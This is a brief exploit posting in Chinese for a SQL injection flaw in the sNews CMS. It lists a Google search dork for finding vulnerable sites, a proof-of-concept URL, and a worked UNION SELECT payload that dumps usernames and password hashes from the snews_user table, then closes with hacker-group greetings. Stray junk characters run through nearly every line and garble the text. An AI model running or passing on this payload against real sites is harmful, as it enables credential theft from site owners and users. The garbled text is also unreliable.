标题: CMS snews SQL Injection Vulnerability! o, F0 u) i8 q/ i: n- D6 F
作者: By onestree
& g7 l3 r. j7 [; i下载地址 : http://snewscms.com/& i8 R4 p* j9 F4 L% C
测试平台 : ubuntu 12.10 / win 7: Y3 s- ]3 r* a4 O& D- m( c/ X
关键词: inurl:"tanyakan pada rumput yang bergoyang"/ ]+ v, J) T: ?6 s
* e x! k+ J$ H! Y; K0 _( y0 G
" }6 x H. v6 i# V- j. l*************************************************************
1 J6 m, L+ z8 `. m
; L1 e# T, H- Q$ PSQL poc:5 f1 l8 Y/ q1 o9 s# F' I' p+ ?
" K" p& r' Q% ohttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]' b3 s% L% y5 Y3 H6 F) n g: {
: A6 s; D1 z( S
示例
2 j( M# O9 e" w5 w' c1 L
+ `) r$ L7 |" s( }http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*( W6 l+ I2 ?. O4 I5 `: u# @$ l
, H5 L, I7 b/ r& ]
7 f. A K( O4 p3 Q+ W- q致谢:
/ x0 A8 H% X7 d1 d7 ?# R# E ; z( _/ f# B* |+ z) E
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ m/ R- n$ D( B% P - h9 d; r" H/ k/ R
indonesiancoder - moeslimh4x0r - go-coder8 b& D; E+ L7 r: v' M
7 C- v" K2 s6 W( o4 n \1 [8 y3 zspesial my hunny :*
1 I) C; L, E" h |